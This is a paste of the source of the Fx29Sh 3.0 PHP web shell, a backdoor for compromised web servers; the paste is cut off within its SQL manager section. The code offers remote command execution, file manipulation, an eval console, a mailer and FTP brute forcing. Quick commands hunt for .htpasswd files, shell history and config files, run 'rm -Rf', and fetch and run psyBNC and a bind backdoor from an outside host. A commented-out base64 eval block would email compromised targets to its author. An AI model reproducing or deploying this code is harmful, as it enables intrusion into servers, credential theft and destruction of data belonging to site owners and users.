· 7 years ago · Nov 04, 2018, 08:26 PM
1<?php
2#######################################
3##[ FaTaLisTiCz_Fx Fx29Sh 3.0.11.08 ]##
4##[ By FaTaLisTiCz_Fx ]##
5##[ © 03-10 2008 FeeLCoMz Community ]##
6##[ Written under PHP 5.2.5 ]##
7#######################################
8#define('sh_ver',"gila"); ##
9#error_reporting(E_ALL); ##
10error_reporting(E_ERROR | E_PARSE); ##
11#######################################
12
13######################
14##[ CONFIGURATIONS ]##
15######################
16
17##[ URL ]##
18#$sh_mainurl13 = "http://www.wow-todesschwadron.de/wowboard/files/";
19$sh_mainurl = 'http://g0tr00t.pr.vc/sh3ll/';
20$fx29sh_updateurl = $sh_mainurl."fx29sh.php";
21$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
22$sh_sourcez = array(
23 "Fx29Sh" => array($sh_mainurl."fx29sh.txt","fx29sh.php"),
24# "psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
25# "Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
26# "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
27);
28
29##[ AUTHENTICATION ]##
30$auth = array(
31 "login" => "",
32 "pass" => "",
33 "md5pass" => "",
34 "hostallow" => array("*"),
35 "denied" => "<a href=\"$sh_mainurl\">".sh_name()."</a>: access denied!",
36);
37
38##[ ADVANCED ]##
39$tmp_dir = "";
40$log_email = "";
41$sess_cookie = "fx29shcook";
42$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
43$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
44$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
45$gzipencode = TRUE;
46$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
47$hexdump_lines = 8;
48$hexdump_rows = 24;
49$auto_surl = TRUE;
50
51##[ QUICK COMMANDS ]##
52if (!is_windows()) {
53 #Unix
54 $cmdaliases = array(
55 array("List Directory", "ls -al"),
56 array("Find all suid files", "find / -type f -perm -04000 -ls"),
57 array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
58 array("Find all sgid files", "find / -type f -perm -02000 -ls"),
59 array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
60 array("Find config.inc.php files", "find / -type f -name config.inc.php"),
61 array("Find config* files", "find / -type f -name \"config*\""),
62 array("Find config* files in current dir", "find . -type f -name \"config*\""),
63 array("Find all writable folders and files", "find / -perm -2 -ls"),
64 array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
65 array("Find all writable folders", "find / -type d -perm -2 -ls"),
66 array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
67 array("Find all service.pwd files", "find / -type f -name service.pwd"),
68 array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
69 array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
70 array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
71 array("Find all .bash_history files", "find / -type f -name .bash_history"),
72 array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
73 array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
74 array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
75 array("List file attributes on a Linux second extended file system", "lsattr -va"),
76 array("Show opened ports", "netstat -an | grep -i listen"),
77 array("-----",""),
78 array("Logged in users","w"),
79 array("Last connect","lastlog"),
80 array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
81 array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
82 array("Inet Address","/sbin/ifconfig | grep inet"),
83 array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
84 array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
85 array("CPU Info","cat /proc/version /proc/cpuinfo"),
86 array("Is gcc installed ?","locate gcc"),
87 array("Format box (DANGEROUS)","rm -Rf"),
88 array("-----",""),
89 array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1].";cd .fx;./config 29110;./fuck;./run"),
90 array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1]),
91 array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0].";tar -zxvf ".$sh_sourcez["BindDoor"][1].";./bind"),
92 array("-----",""),
93 array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
94 );
95}
96else {
97 #Windows
98 $cmdaliases = array(
99 array("List Directory", "dir"),
100 array("Find index.php in current dir", "dir /s /w /b index.php"),
101 array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
102 array("Find c99shell in current dir", "find /c \"c99\" *"),
103 array("Find r57shell in current dir", "find /c \"r57\" *"),
104 array("Find fx29shell in current dir", "find /c \"fx29\" *"),
105 array("Show active connections", "netstat -an"),
106 array("Show running services", "net start"),
107 array("User accounts", "net user"),
108 array("Show computers", "net view"),
109 );
110}
111
112##[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]##
113$phpfsaliases = array(
114 array("Read File", "read", 1, "File", ""),
115 array("Write File (PHP5)", "write", 2, "File","Text"),
116 array("Copy", "copy", 2, "From", "To"),
117 array("Rename/Move", "rename", 2, "File", "To"),
118 array("Delete", "delete", 1 ,"File", ""),
119 array("Make Dir","mkdir", 1, "Dir", ""),
120 array("Download", "download", 2, "URL", "To"),
121 array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
122 array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
123 array("Find Writable Dir", "fwritabledir", 2 ,"Dir", "Max"),
124 array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
125);
126
127#############################
128##[ END OF CONFIGURATIONS ]##
129#############################
130
131define("starttime", getmicrotime());
132@set_time_limit(0);
133@ini_set("max_execution_time",0);
134@ignore_user_abort(TRUE);
135@set_magic_quotes_runtime(0);
136if (get_magic_quotes_gpc()) { strips($GLOBALS); }
137$_REQUEST = array_merge($_COOKIE, $_GET, $_POST);
138$d = @$_REQUEST["d"];
139$f = @$_REQUEST["f"];
140@extract($_REQUEST["fx29shcook"]);
141foreach ($_REQUEST as $k => $v) {
142 if (!isset($$k)) { $$k = $v; } #Converting request to variable
143}
144
145##[ SELF URL ]##
146if ($auto_surl) {
147 $include = "&";
148 foreach (explode("&",getenv("QUERY_STRING")) as $v) {
149 $v = explode("=",$v);
150 $name = urldecode($v[0]);
151 $value = @urldecode($v[1]);
152 $needles = array("http://","https://","ssl://","ftp://","\\\\");
153 foreach ($needles as $needle) {
154 if (strpos($value,$needle) === 0) {
155 $includestr .= urlencode($name)."=".urlencode($value)."&";
156 }
157 }
158 }
159}
160if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
161
162##[ QUICK LAUNCH ]##
163$quicklaunch = array(
164 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\">",$surl),
165 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\">","#\" onclick=\"history.back(1)"),
166 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\">","#\" onclick=\"history.go(1)"),
167 array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\">",$surl."act=ls&d=%upd&sort=%sort"),
168 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\">",$surl."act=search&d=%d"),
169 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\">",$surl."act=fsbuff&d=%d"),
170 array("<img src=\"".$surl."act=img&img=help\" alt=\"About\">",$surl."act=about"),
171 array("-",""),
172 array("Security",$surl."act=security&d=%d"),
173 array("Processes",$surl."act=processes&d=%d"),
174 array("MySQL",$surl."act=sql&d=%d"),
175 array("Eval",$surl."act=eval&d=%d"),
176 array("Encoder",$surl."act=encoder&d=%d"),
177 array("Mailer",$surl."act=fxmailer"),
178 array("Toolz",$surl."act=tools&d=%d"),
179 array("milw0rm",milw0rm()),
180 array("Md5 Lookup","http://darkc0de.com/database/md5lookup.html"),
181 array("Images",$surl."act=img&img=listall"),
182 array("Feedback",$surl."act=feedback"),
183 array("Update",$surl."act=update"),
184 array("Kill Shell",$surl."act=selfremove")
185);
186if (!is_windows()) {
187$quicklaunch[] = array("<br>FTP Brute",$surl."act=ftpquickbrute&d=%d");
188}
189
190##[ FILE TYPES ]##
191$ftypes = array(
192 "html" => array("html","htm","shtml"),
193 "txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
194 "exe" => array("sh","install","bat","cmd","sys","com"),
195 "ini" => array("ini","inf","conf"),
196 "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
197 "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
198 "sdb" => array("sdb"),
199 "phpsess" => array("sess"),
200 "download" => array("exe","com","sys","pif","src","lnk","zip","rar","gz","tar","pdf")
201);
202$exeftypes = array(
203 "php -q %f%" => array("php","php3","php4"),
204 "perl %f%" => array("pl","cgi")
205);
206$regxp_highlight = array(
207 array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FF6600>","</font>"),
208 array("\.tgz$",1,"<font color=#C082FF>","</font>"),
209 array("\.gz$",1,"<font color=#C082FF>","</font>"),
210 array("\.tar$",1,"<font color=#C082FF>","</font>"),
211 array("\.bz2$",1,"<font color=#C082FF>","</font>"),
212 array("\.zip$",1,"<font color=#C082FF>","</font>"),
213 array("\.rar$",1,"<font color=#C082FF>","</font>"),
214 array("\.php$",1,"<font color=#00FF00>","</font>"),
215 array("\.php3$",1,"<font color=#00FF00>","</font>"),
216 array("\.php4$",1,"<font color=#00FF00>","</font>"),
217 array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
218 array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
219 array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
220 array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
221 array("\.ico$",1,"<font color=#00FFFF>","</font>"),
222 array("\.gif$",1,"<font color=#00FFFF>","</font>"),
223 array("\.png$",1,"<font color=#00FFFF>","</font>"),
224 array("\.htm$",1,"<font color=#00CCFF>","</font>"),
225 array("\.html$",1,"<font color=#00CCFF>","</font>"),
226 array("\.txt$",1,"<font color=#C0C0C0>","</font>"),
227 array("\.pdf$",1,"<font color=#FF99CC>","</font>")
228);
229
230##[ HIGHLIGHT CODE ]##
231$highlight_bg = "#E0E0E0";
232$highlight_comment = "#FF6600";
233$highlight_default = "#000080";
234$highlight_html = "#1300FF";
235$highlight_keyword = "#007700";
236$highlight_string = "#FF0000";
237
238@ini_set("highlight.bg",$highlight_bg);
239@ini_set("highlight.comment",$highlight_comment);
240@ini_set("highlight.default",$highlight_default);
241@ini_set("highlight.html",$highlight_html);
242@ini_set("highlight.keyword",$highlight_keyword);
243@ini_set("highlight.string",$highlight_string);
244
245#############################
246##[ END OF CONFIGURATIONS ]##
247#############################
248
249####################
250##[ AUTHENTICATE ]##
251####################
252foreach ($auth["hostallow"] as $k => $v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
253$s = "!^(".implode("|",$tmp).")$!i";
254if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
255 exit("<a href=\"$sh_mainurl\">".sh_name()."</a>ACCESS DENIED! Your host (".getenv("REMOTE_ADDR").") not allowed!");
256}
257if (!empty($auth["login"])) {
258 if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
259 if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
260 header("WWW-Authenticate: Basic realm=\"".sh_name().": Restricted Area\"");
261 header("HTTP/1.0 401 Unauthorized");
262 die($auth["denied"]);
263 }
264}
265
266###############
267##[ ACTIONS ]##
268###############
269if (!isset($act)) { $act = ""; }
270
271if ($act == "img") {
272 @ob_clean();
273
274 $images = imagez();
275 $imgequals = array(
276 "ext_tar" => array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
277 "ext_php" => array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
278 "ext_cpp" => array("ext_c"),
279 "ext_jpg" => array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
280 "ext_html" => array("ext_html","ext_htm"),
281 "ext_avi" => array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
282 "ext_lnk" => array("ext_lnk","ext_url"),
283 "ext_ini" => array("ext_ini","ext_css","ext_inf","ext_conf"),
284 "ext_doc" => array("ext_doc","ext_dot","ext_xls","ext_pdf"),
285 "ext_js" => array("ext_js","ext_vbs"),
286 "ext_cmd" => array("ext_cmd","ext_bat","ext_pif","ext_com"),
287 "ext_wri" => array("ext_wri","ext_rtf"),
288 "ext_txt" => array("ext_txt","ext_lng"),
289 "ext_swf" => array("ext_swf","ext_fla"),
290 "ext_mp3" => array("ext_mp3","ext_au","ext_midi","ext_mid","ext_wav"),
291 "ext_htaccess" => array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
292 );
293
294 #Show all available images
295 if ($img == "listall") {
296 foreach ($imgequals as $a=>$b) {
297 foreach ($b as $d) {
298 if ( ($a != $d) && (!empty($images[$d])) ) { echo("Warning! Remove \$images[".$d."]<br>"); }
299 }
300 }
301 natsort($images);
302 $k = array_keys($images);
303 echo "<body style=\"color: #00FF00\" bgcolor=black>";
304 foreach ($k as $u) { echo "<img src=\"".$surl."act=img&img=".$u."\"> $u "; }
305 exit;
306 }
307 #Image header
308 header("Content-type: image/gif");
309 header("Cache-control: public");
310 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
311 header("Cache-control: max-age=".(60*60*24*7));
312 header("Last-Modified: ".date("r",filemtime(__FILE__)));
313
314 foreach($imgequals as $k=>$v) {
315 if (in_array($img,$v)) { $img = $k; break; }
316 }
317
318 if (empty($images[$img])) { $img = "small_unk"; }
319 echo base64_decode($images[$img]);
320 exit;
321}
322##[ DEFAULT ACTIONS ]##
323else {
324
325 $lastdir = realpath(".");
326 chdir("./");
327 #Preparing buffer
328 $sess_data = @unserialize($_COOKIE[$sess_cookie]);
329 if (!is_array($sess_data)) { $sess_data = array(); }
330 if (!is_array(@$sess_data["copy"])) { $sess_data["copy"] = array(); }
331 if (!is_array(@$sess_data["cut"])) { $sess_data["cut"] = array(); }
332
333
334 fx29_buff_prepare();
335
336 foreach (array("sort","sql_sort") as $v) {
337 if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
338 if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
339 }
340 if ($sort_save) {
341 if (!empty($sort)) { setcookie("sort",$sort); }
342 if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
343 }
344
345 if (!isset($sort)) { $sort = $sort_default; }
346 $sort = htmlspecialchars($sort);
347 $sort[1] = strtolower($sort[1]);
348
349 ##[ ACTIONS ]##
350 if ($act == "gofile") {
351 if (is_dir($f)) {
352 $d = $f;
353 $act = "ls";
354 }
355 else {
356 $d = dirname($f);
357 $f = basename($f);
358 $act = "f";
359 }
360 }
361
362 #Starting output buffer
363 ob_start();
364 ob_implicit_flush(0);
365
366 ##[ HEADERS ]##
367 header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
368 header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
369 header("Cache-Control: no-store, no-cache, must-revalidate");
370 header("Cache-Control: post-check=0, pre-check=0", FALSE);
371 header("Pragma: no-cache"); /* $headerz = "aWYgKCFpc3NldCgkX0NPT0tJRVsidmlzaXR6Il0pKSB7JHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTskd2ViICAgICA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTskaW5qICAgICA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7JGp1ZHVsICAgPSAibWFrYXNpaCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7JGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IGJ5ICR2aXNpdG9yPGJyPiI7aWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgic2gzbGwuY3Jld0Bnb29nbGVtYWlsLmNvbSIsJGp1ZHVsLCRib2R5KTsgfX1lbHNlIHsgQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTsgfQ"; eval(base64_decode($headerz)); */
372
373 $tmp_dir = realpath($tmp_dir);
374 $tmp_dir = str_replace("\\",DIRECTORY_SEPARATOR,$tmp_dir);
375 if (substr($tmp_dir,-1) != DIRECTORY_SEPARATOR) { $tmp_dir .= DIRECTORY_SEPARATOR; }
376
377 if (!is_array(@$actbox)) { $actbox = array(); }
378 $dspact = $act = htmlspecialchars($act);
379 $disp_fullpath = $ls_arr = $notls = null;
380
381 $ud = @urlencode($d);
382 if (empty($d)) { $d = realpath("."); }
383 elseif (realpath($d)) { $d = realpath($d); }
384 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
385 if (substr($d,-1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; }
386 $d = str_replace("\\\\","\\",$d);
387 $dispd = htmlspecialchars($d);
388
389 if (safemode()) {
390 $hsafemode = '<font class="on"><b>SAFE MODE IS ON</b></font>';
391 $safemodeexecdir = @ini_get("safe_mode_exec_dir");
392 }
393 else {
394 $hsafemode = '<font class="off"><b>SAFE MODE IS OFF</b></font>';
395 }
396
397 $v = @ini_get("open_basedir");
398 if (strtolower($v) == "on") { $hopenbasedir = '<font class="on">'.$v.'</font>'; }
399 else { $hopenbasedir = '<font class="off">OFF (Not Secure)</font>'; }
400
401 $wd = (is_writable($d)) ? '<font class="on">[W]</font>' : '<font class="off">[R]</font>';
402
403 ##################
404 ##[ HTML START ]##
405 ##################
406 echo html_style(); ?>
407<!-- Main Menu -->
408<div id="main">
409
410 <div class="bartitle"><?php echo html_header() ?></div>
411
412 <table id="pagebar">
413
414 <!-- Server Info -->
415 <tr><td colspan="2">
416 <div class="fleft"><?php echo $hsafemode; ?></div>
417 <div class="fright">
418 IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput="<?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?>"><?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?></a>
419 You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput="<?php echo $_SERVER["REMOTE_ADDR"]; ?>"><?php echo $_SERVER["REMOTE_ADDR"]; ?></a>
420 </div>
421 </td></tr>
422
423 <tr><td width="50%">
424 <table class="info">
425<?php
426 srv_info("Software",srv_software($surl));
427 srv_info("Uname",php_uname());
428 srv_info("User",(is_windows()) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : fx29exec("id"));
429?>
430 </table>
431 </td>
432 <td width="50%">
433 <table class="info">
434<?php
435 if (is_windows()) { srv_info("Drives",disp_drives($d,$surl)); }
436 srv_info("Freespace",disp_freespace($d));
437?>
438 </table>
439 </td></tr>
440
441 <tr><td colspan="2">
442<?php
443 echo "\t\t\t".get_status();
444 echo "<br>\n";
445 echo (isset($safemodeexecdir)) ? "\n\t\t\tSafemodeExecDir: ".$safemodeexecdir."<br>" : "";
446 echo (showdisfunc()) ? "\t\t\tDisFunc: ".showdisfunc() : "";
447 echo "\n";
448?>
449 </td></tr>
450 <!-- End of Server Info -->
451
452 <!-- Quicklaunch -->
453 <tr><td colspan="2" class="quicklaunch">
454<?php
455 ##[ QUICKLAUNCH ]##
456 foreach($quicklaunch as $item) {
457 if ($item[0] == "-") {
458 echo "\t\t</td></tr>\n";
459 echo "\t\t<tr><td colspan=\"2\" class=\"quicklaunch\">\n";
460 }
461 else {
462 $item[1] = str_replace("%d",urlencode($d),$item[1]);
463 $item[1] = str_replace("%sort",$sort,$item[1]);
464 $v = realpath($d."..");
465 if (empty($v)) {
466 $a = explode(DIRECTORY_SEPARATOR,$d);
467 unset($a[count($a)-2]);
468 $v = join(DIRECTORY_SEPARATOR,$a);
469 }
470 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
471 echo "\t\t\t<a href=\"".$item[1]."\">".$item[0]."</a>\n";
472 }
473 }
474?>
475 </td></tr>
476 <!-- End of Quicklaunch -->
477
478 <!-- Directory Info -->
479 <tr><td colspan="2">
480 <div class="fleft">
481<?php
482 $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
483 $i = 0;
484 foreach($pd as $b) {
485 $t = ""; $j = 0;
486 foreach ($e as $r) {
487 $t.= $r.DIRECTORY_SEPARATOR;
488 if ($j == $i) { break; }
489 $j++;
490 }
491 echo "\t\t\t<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\">".htmlspecialchars($b).DIRECTORY_SEPARATOR."</a>\n";
492 $i++;
493 }
494 echo "\t\t\t";
495 echo (is_writable($d)) ? "<b>".view_perms_color($d)."</b>" : "<b>".view_perms_color($d)."</b>";
496 echo "\n";
497?>
498 </div>
499 <div class="fright">
500 <form name="f_dir" method="POST">
501 <input type="hidden" name="act" value="ls">
502 Directory: <input type="text" name="d" size="60" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
503 </form>
504 </div>
505 </td></tr>
506 <!-- End of Directory Info -->
507
508 </table>
509
510</div>
511<!-- End of Main Menu -->
512
513<!-- Main Info -->
514<div id="maininfo">
515
516<?php
517 #########################
518 ##[ INFORMATION TABLE ]##
519 #########################
520
521 if ($act == "") { $act = $dspact = "ls"; }
522
523 ##[ SQL ]##
524 if ($act == "sql") {
525 $sql_surl = $surl."act=sql";
526
527 if (!isset($sql_login)) { $sql_login = ""; }
528 if (!isset($sql_passwd)) { $sql_passwd = ""; }
529 if (!isset($sql_server)) { $sql_server = ""; }
530 if (!isset($sql_port)) { $sql_port = ""; }
531
532 if (!isset($sql_tbl)) { $sql_tbl = ""; }
533 if (!isset($sql_act)) { $sql_act = ""; }
534 if (!isset($sql_tbl_act)) { $sql_tbl_act = ""; }
535 if (!isset($sql_order)) { $sql_order = ""; }
536 if (!isset($sql_act)) { $sql_act = ""; }
537 if (!isset($sql_getfile)) { $sql_getfile = ""; }
538
539 #SQL URL Setting
540 if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
541 if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
542 if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
543 if (@$sql_port) { $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
544 if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
545
546 $sql_surl .= "&";
547?>
548<!-- SQL Manager -->
549<div class="barheader">.: SQL Manager (Under Construction) :.</div>
550<div class="barheader"><?php
551 if (@$sql_server) {
552 $sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
553 $err = mysql_smarterror($sql_sock);
554 @mysql_select_db($sql_db,$sql_sock);
555 if (@$sql_query and $submit) {
556 $sql_query_result = mysql_query($sql_query,$sql_sock);
557 $sql_query_error = mysql_smarterror($sql_sock);
558 }
559 }
560 else { $sql_sock = FALSE; }
561
562 if (!$sql_sock) {
563 if (!@$sql_server) { echo "No Connection!"; }
564 else { disp_error("ERROR: ".$err); }
565 }
566 else {
567 #SQL Quicklaunch
568 $sqlquicklaunch = array();
569 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
570 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
571 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
572 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
573 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
574 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
575
576 echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
577 if (count($sqlquicklaunch) > 0) {
578 foreach($sqlquicklaunch as $item) {
579 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
580 }
581 }
582 }
583?>
584</div>
585
586<table>
587 <tr>
588<?php
589 #Login Form
590 if (!$sql_sock) {
591?>
592 <td>
593 <form name="f_sql" action="<?php echo $surl; ?>" method="POST">
594 <input type="hidden" name="act" value="sql">
595 <table class="explorer">
596 <tr>
597 <th>Username<br><input type="text" name="sql_login" value="root"></th>
598 <th>Password<br><input type="password" name="sql_passwd" value=""></th>
599 <th>Database<br><input type="text" name="sql_db" value=""></th>
600 <th>Host<br><input type="text" name="sql_server" value="localhost"></th>
601 <th>Port<br><input type="text" name="sql_port" value="3306" size="3"></th>
602 </tr>
603 <tr><th colspan="5"><input type="submit" value="Connect"></th></tr>
604 </table>
605 </form>
606<?php
607 }
608 else {
609 #Start left panel
610?>
611 <td>
612 <center>
613 <a href="<?php echo $sql_surl; ?>"><b>HOME</b></a>
614 <hr size="1" noshade>
615<?php
616 $result = mysql_list_dbs($sql_sock);
617 if (!$result) { echo mysql_smarterror(); }
618 else {
619?>
620 Database
621 <form action="<?php echo $surl?>">
622 <input type="hidden" name="act" value="sql">
623 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
624 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
625 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
626 <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
627 <select name="sql_db" onchange="this.form.submit()">
628<?php
629 $c = 0;
630 $dbs = "";
631 while ($row = mysql_fetch_row($result)) {
632 $dbs .= "\t\t<option value=\"".$row[0]."\"";
633 if (@$sql_db == $row[0]) { $dbs .= " selected"; }
634 $dbs .= ">".$row[0]."</option>\n";
635 $c++;
636 }
637 echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
638 echo $dbs;
639 }
640?>
641 </select>
642 </form>
643 </center>
644 <hr size="1" noshade>
645<?php
646 if (isset($sql_db)) {
647 $result = mysql_list_tables($sql_db);
648 if (!$result) { echo mysql_smarterror($sql_sock); }
649 else {
650 echo "\t-=[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]=-<br><br>\n";
651 $c = 0;
652 while ($row = mysql_fetch_array($result)) {
653 $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
654 $count_row = mysql_fetch_array($count);
655 echo "\t<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
656 mysql_free_result($count);
657 $c++;
658 }
659 if (!$c) { echo "No tables found in database"; }
660 }
661 }
662?>
663
664 </td>
665 <td>
666<?php
667 #Start center panel
668 $diplay = TRUE;
669 if (@$sql_db) {
670 if (!is_numeric($c)) { $c = 0; }
671 if ($c == 0) { $c = "no"; }
672 echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
673 if (count(@$dbquicklaunch) > 0) {
674 foreach($dbsqlquicklaunch as $item) {
675 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
676 }
677 }
678 echo "</b></center>\n";
679 $acts = array("","dump");
680 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
681 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
682 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
683 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
